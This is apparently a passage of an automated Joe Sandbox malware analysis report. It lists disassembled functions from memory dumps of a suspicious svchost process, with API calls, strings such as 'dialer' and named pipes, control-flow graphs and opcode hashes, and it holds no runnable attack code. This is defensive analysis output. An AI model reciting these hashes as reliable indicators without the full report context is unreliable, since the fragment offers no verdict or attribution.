                                                                                                                            • Instruction Fuzzy Hash: 81E19C72604B80CAEB689B25D48839D77A0F769B88F104525EEC957F99CB3EC291C702

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: 7e27abf47b83b17f015314e1dc6a0d4402c721e608e4e3179cb03febb156a4ab
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: 5541F823315A0051FB19CB66A809759A399FF65BE0F0A41359E8D87FC4EF3EC7858302

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 735 23af32e104c-23af32e10b9 RegQueryInfoKeyW 736 23af32e11b5-23af32e11d0 735->736 737 23af32e10bf-23af32e10c9 735->737 737->736 738 23af32e10cf-23af32e111f RegEnumValueW 737->738 739 23af32e11a5-23af32e11af 738->739 740 23af32e1125-23af32e112a 738->740 739->736 739->738 740->739 741 23af32e112c-23af32e1135 740->741 742 23af32e1147-23af32e114c 741->742 743 23af32e1137 741->743 745 23af32e1199-23af32e11a3 742->745 746 23af32e114e-23af32e1193 GetProcessHeap call 23af32f6168 GetProcessHeap HeapFree 742->746 744 23af32e113b-23af32e113f 743->744 744->739 747 23af32e1141-23af32e1145 744->747 745->739 746->745 747->742 747->744
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: c2ce9a83bb39aa8cf87631e872da634b098ba8a270060c436afb6f1334a8ced9
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: B9417C76214B84C6E764CF21E44979EB7A5F388B88F048129DA890BB98DF3DD589CB01

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: 9b97164e2f521d5ce6a6030bd677edd7b008a30c487866d669dd02ea5029d614
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: F211936470024046FB6CA726965F369E2495F647F0F184334A8F90BEDADE2FC7828212
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: cc4bd47b747a076d3a70656ebe8af1318798e3ef24b2b66c07c979a3a6a4a38b
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: F781D02170020186FB5CAB6DE44B39DA298AF75B84F184435EAC447FD6EB3FCB859702
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: 29a3aad0747f712a65b36c3bf1f5cb4a4b5ca32a0e5e27ed2c0d311cdf3eb7cb
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: 7131C721312740D1EF19DB52A409B59A29CFB68BA0F5D09379E9D07BD0DF3EC6C58742
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: 9dc6895154f490a0fa1379aad1beb104b20039b2d52934f260433463d6ad7ce2
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 5E118231710B4086E7549B66E84831D76A4F798FE8F144234EEDA87BD4CF3DC6148B85
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: ee159a358a29a47cc67f4c3be2c5703ed440c377ad2b83d771141e801391207f
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: 9E113C2670474183EF189B21F449669B2B8FB58B85F540039DFC907B94EF3EC645CB05
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction ID: 78766e4399c8dc549f545ec081a1babf1706de50ce668165723e5713332fdb27
                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction Fuzzy Hash: E6D1BC76214B8881DB74DB0AE49535AB7B4F7D8B88F140226EACD47BA5CF3DC681CB41
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: e058bc9bb3b8aa6a493347436ec1e847b338baec1071684e9e682a020670fa46
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: D431C722701B5182E718DF26D54972AA7A4FF64B85F0841349FC947F95EF3EC6E18701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\system32\svchost.exe
                                                                                                                            • API String ID: 3168794593-4180442734
                                                                                                                            • Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction ID: 86b26c9247c8104daadc16f0a306905e38207ed0c73cb0503fda9d0042af8dc4
                                                                                                                            • Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction Fuzzy Hash: 3821A567608AD08AE358EF359C5929E27A9F765F44F094035DBC543BC3DE2FD6048B02
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: d626b139bf2515b181b52ca9d9c8d6f5990de9874432f050005ae24276e9d5b3
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: E111632070024046FB6CA776965F329A24A6F647B4F184735A8F647FDADE2EC7818612
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: aa8edf9784ca19634c0ee458ceaeb90963ad875c59a58248a1554905202c4035
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 24012D21700A4082EB68DB62E45C75AA3A9FB98FC4F584035DEC943B95DF3DCA89CB41
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: 423760b10cb6e8f78dc04e5dde3cead2652d295327a5c384355b2ac6181d5524
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 18012D6531174082EB289B21E84D71A77A8FB65B86F180538CED907BD5EF3FC648CB02
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: 9626061da8fd3a460f6d6bcb32d7400cd34d453b169b234c9771e9f97e557f6b
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 0A51A236701200C6DB1CCB25D44DB58B79AFB64F88F508136DA964BBC8EB7ECA80C702
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: 63ffd36dcd3943f539e9afe8a9a4ee23790d34f2e488548bf04ad3c00dfbb63a
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 9B31B135300640C6E718DF21E84D719B7A9FB60B88F458025EE9647BC9DB3ECA80CB06
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: 9a0e6a1fe0657e61cc3420f84ac3a8e5e479968615e898656d2d3c1efce8d65c
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: 0BF0442230464192EB749F21F88875D6764F768B88F944034DAC946ED4DF3DC78DCB01
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: 8cbddb09e37f53dfba20b492dcc1bf506de27857d4e4897c64d7ae3e1c0e4dbf
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: A0F01264714B8482EB188B63F95C11DA669FB68FD1F085130EEC647F98DF3DC6858B01
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: 4552aeee208f1e4eb317f117dcf18f4d43626f128b76397a397e3b68f671a9f9
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: 78F0966131570582EB188B39E45D35D6364FBA4BA1F540239CEEA45AE4DF3EC284CB01
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction ID: bfe489d3787a43adbdb8949a248df29ba402fffb18460cabcb06d35754e30a04
                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction Fuzzy Hash: A502F836219B8086EB64CB59F49535AB7A4F7D5B84F200025EACE87FA8DF7DC584CB01
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction ID: fe422fe2fd9d0706cea3f397b35ccc64bf2cadb06e89a3cd03a3bdbea785b399
                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction Fuzzy Hash: B2610736528B44C6E764CB15E45931AB7A4F798784F200225EACE47FE8DB7EC690CF02
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: e9de8037cbce042c27c932672d77890c086474da7a56bb84ffd5d32a8a1e3d9f
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 3611A322B10A5411FB6C357AE85D76F11406B78BB8F080634A9F607FD6CBEECB454A02
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: acea8926f7d136cfad38a04c0ef70594d412019f0ee89facdd49f03dfbda46d2
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 0111A722650A1111FB9D1528E4CEB6911806B7D3F4F494E38ABE606FD7CA2ECB414103
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: 9efe82dca6fcfd4791c48a83946f65ccc29f20e32eafcd21540cc00e88081b6b
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: DE61C73661064066FB6D8B69E54C32E66A0F775780F548835CAC617FE9DB3ECB418303
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 2e8c72c1664f9f4bebce3a912c6b2e38c4a59c609ae7cbd361f64ae5fe444afe
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: AC615A33600B848AEB18DF65D44539DB7B4FB68B88F045226EF8917B98DB3DC695C701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 2e758ee95c6cf0a9fc398afdb6447f599c145550cfacbb52d9e3712b1ed94f51
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 9C517E721003808AEB788F26958A359B7A8FF65B85F184136DAD947FD5CB3ED6D0C702
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: e22a72a4e32a4c346d049e31fc576438882dc496dc454bcd5971b3730cb575cf
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: AA516C32104680CAEB788F25955835C77A0F365B94F188226DED987FD6CB3ED6A1CB02
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
